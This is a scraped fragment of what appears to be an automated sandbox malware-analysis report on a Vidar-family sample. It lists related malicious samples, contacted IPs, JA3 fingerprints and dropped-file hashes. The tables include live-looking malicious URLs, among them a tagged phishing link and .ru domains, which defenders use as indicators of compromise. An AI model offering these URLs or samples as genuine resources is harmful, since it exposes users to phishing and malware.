	cMTqzvmx9u.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse	104.208.16.94
	armv5l.elf	Get hash	malicious	Unknown	Browse	20.82.46.15
	armv7l.elf	Get hash	malicious	Unknown	Browse	23.96.213.168
	splm68k.elf	Get hash	malicious	Unknown	Browse	22.194.19.202
	nklarm7.elf	Get hash	malicious	Unknown	Browse	22.109.0.81
	splarm7.elf	Get hash	malicious	Unknown	Browse	22.194.60.247
	nklarm5.elf	Get hash	malicious	Unknown	Browse	21.74.41.87
	jklspc.elf	Get hash	malicious	Unknown	Browse	40.93.122.151
AKAMAI-ASN1EU	Canvas of Kings_N6xC-S2.exe	Get hash	malicious	Unknown	Browse	184.85.182.130
	cMTqzvmx9u.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse	88.221.134.155
	3zg6i6Zu1u.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	oiF7u78bY2.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Gq48hjKhZf.exe	Get hash	malicious	LodaRAT	Browse	172.232.216.250
	L5Kgf2Tvkc.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	7uJ95NO82G.exe	Get hash	malicious	LodaRAT	Browse	172.232.216.250
	nabx86.elf	Get hash	malicious	Unknown	Browse	23.7.216.65
	Violated Heroine_91zbZ-1.exe	Get hash	malicious	Unknown	Browse	184.85.182.130
	[External] 120112 Manual Policies Overview Guide_ 8VM8-WZPT3L-LYH1.eml	Get hash	malicious	Unknown	Browse	23.195.39.65
CLOUDFLARENETUS	http://6p8c.enterszcainmenthub.ru	Get hash	malicious	Unknown	Browse	104.21.68.200
	d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	datasett.exe	Get hash	malicious	Unknown	Browse	104.26.3.46
	https://tb.ldpdljrr.ru/	Get hash	malicious	Unknown	Browse	104.21.30.230
	installer.msi	Get hash	malicious	Unknown	Browse	172.67.196.179
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.88.181
	badvbscript.html	Get hash	malicious	Unknown	Browse	1.1.1.1
	#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1	Get hash	malicious	Unknown	Browse	172.67.201.143
	https://u48635528.ct.sendgrid.net/ls/click?upn=u001.9c3qucD-2BQzNTT0bmLRTJr37m0fhz0zdKJtvEO5GYL-2FheRuyVOh-2FQG4V3oBgBPYNynDxn_I1ksFJapfNmw0nKrksu71KTxdlg2CVrjzBUVofCtIEhaWkhL1Pph-2Ffg-2BCFbPvkCL9SX-2Fn-2BNBrku3RcjHS1atB8ladrmemt-2BtQU5680xhgoUl-2FmS0Bdj-2FOfednny-2F-2Bj2bwjjubeRvrpN0J7TGLD3CnNRzymiQOzypjCqxHhzmXtY2EWHJMJBxjl-2FHlyEIekWjEdTpTsRC8R5LaI-2BXF4kV8UeUtXxyFJLbYiR3fqcWt2evvBBECu9MeQj8TLZrmfuTf-2BJQraijp8-2BcIdxf8rnVxjHoJK1lo9-2Bkao444JbRSinVA-2FoUxeuAtdlrITU1Z6gHAn7DLZstY4XJkhkT16-2F2TN4CFt2LQ-2BEh9GWg4EPlocPi8ljTs-2B9D9RVbWdc3s2Vk2VPHSj20oCO3-2FalihBzGJuaYie5tnYaz6wBF3EqNzMXmVqRnMZwSYuGRwSMVhkchytYzt3hUH-2F51IUfn7nuhHUcUbdS8nBYneAMuB2eSDRn8IZzUkExLUascCVn8T9ImEyo0qhVsBPdJjfT9L3qli9clY1N-2BhQXDZgQnsN1Bs9PujeLzem37C62BvWnqPnqvXh5vbcvseiZwTP35DEJysw-3D-3D#mlyon@wc.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	wUSt04rfJ0.exe	Get hash	malicious	Quasar	Browse	20.198.119.84
	#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1	Get hash	malicious	Unknown	Browse	20.198.119.84
	gYjK72gL17.exe	Get hash	malicious	Stealc, Vidar	Browse	20.198.119.84
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	20.198.119.84
	Gq48hjKhZf.exe	Get hash	malicious	LodaRAT	Browse	20.198.119.84
	Gq48hjKhZf.exe	Get hash	malicious	Unknown	Browse	20.198.119.84
	singl6.mp4.hta	Get hash	malicious	LummaC	Browse	20.198.119.84
	hnskdfgjgar22.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	20.198.119.84
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	20.198.119.84
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	20.198.119.84
37f463bf4616ecd445d4a1937da06e19	New PO - Supplier 0202AW-PER2.exe	Get hash	malicious	LodaRAT, XRed	Browse	149.154.167.99 188.245.216.205
	RNEQTT.exe	Get hash	malicious	LodaRAT, XRed	Browse	149.154.167.99 188.245.216.205
	installer.msi	Get hash	malicious	Unknown	Browse	149.154.167.99 188.245.216.205
	#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1	Get hash	malicious	Unknown	Browse	149.154.167.99 188.245.216.205
	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Nitol	Browse	149.154.167.99 188.245.216.205
	Canvas of Kings_N6xC-S2.exe	Get hash	malicious	Unknown	Browse	149.154.167.99 188.245.216.205
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.99 188.245.216.205
	installer.msi	Get hash	malicious	Unknown	Browse	149.154.167.99 188.245.216.205
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.99 188.245.216.205
	Violated Heroine_91zbZ-1.exe	Get hash	malicious	Unknown	Browse	149.154.167.99 188.245.216.205

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\680662\Billion.com	vce exam simulator 2.2.1 crackk.exe	Get hash	malicious	LummaC	Browse
	LVDdWBGnVE.exe	Get hash	malicious	LummaC Stealer	Browse
	eMBO6wS1b5.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	AxoPac.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse
	ChoForgot.exe	Get hash	malicious	Vidar	Browse
	94e.exe	Get hash	malicious	Remcos	Browse

Process:	C:\Users\user\AppData\Local\Temp\680662\Billion.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46191
Entropy (8bit):	6.0872308975583
Encrypted:	false
SSDEEP:	768:qMkbJrT8IeQc5dKH+ki1zNt9Xi9vVx+DzJ6PRLv9N2aPeCiozJDSgzMMd6qD47uW:qMk1rT8H1KGXi9tD98aPeFoztSmd6qEL
MD5:	0C2F55F2810889C7E4C8ECEF40681771
SHA1:	D96380800C91DC478DBF29FB14C5FE1B9C8361AA
SHA-256:	FFFA8156C8E7892E4242BE478CE4163C0882C1E0643376AFA3E87D0B15893D10
SHA-512:	067F933FDCB416EBA5B04CCA0F5FE3E9D05B903C6B1587AE4F5F8E78093B2DE9E42D77923CBF0D70E8D034051088AFDAF7B8F87416A20204AB96157853177873
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379538500667114","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"b801fd64-6919-4229-a38a-8914add27428"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6q

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PodcastsTries.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\IMYUKNY5XBIE\16PP89

C:\ProgramData\IMYUKNY5XBIE\58YU37

C:\ProgramData\IMYUKNY5XBIE\6XLN7YM7G

C:\ProgramData\IMYUKNY5XBIE\7YC2NG

C:\ProgramData\IMYUKNY5XBIE\DB1DBA

C:\ProgramData\IMYUKNY5XBIE\HDJEU3

C:\ProgramData\IMYUKNY5XBIE\OHVAS2

C:\ProgramData\IMYUKNY5XBIE\QIWBS2NOP

C:\ProgramData\IMYUKNY5XBIE\S0RQI5

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\15c66898-1364-46f6-9558-c69f08d6e0f7.tmp

Windows Analysis Report
PodcastsTries.exe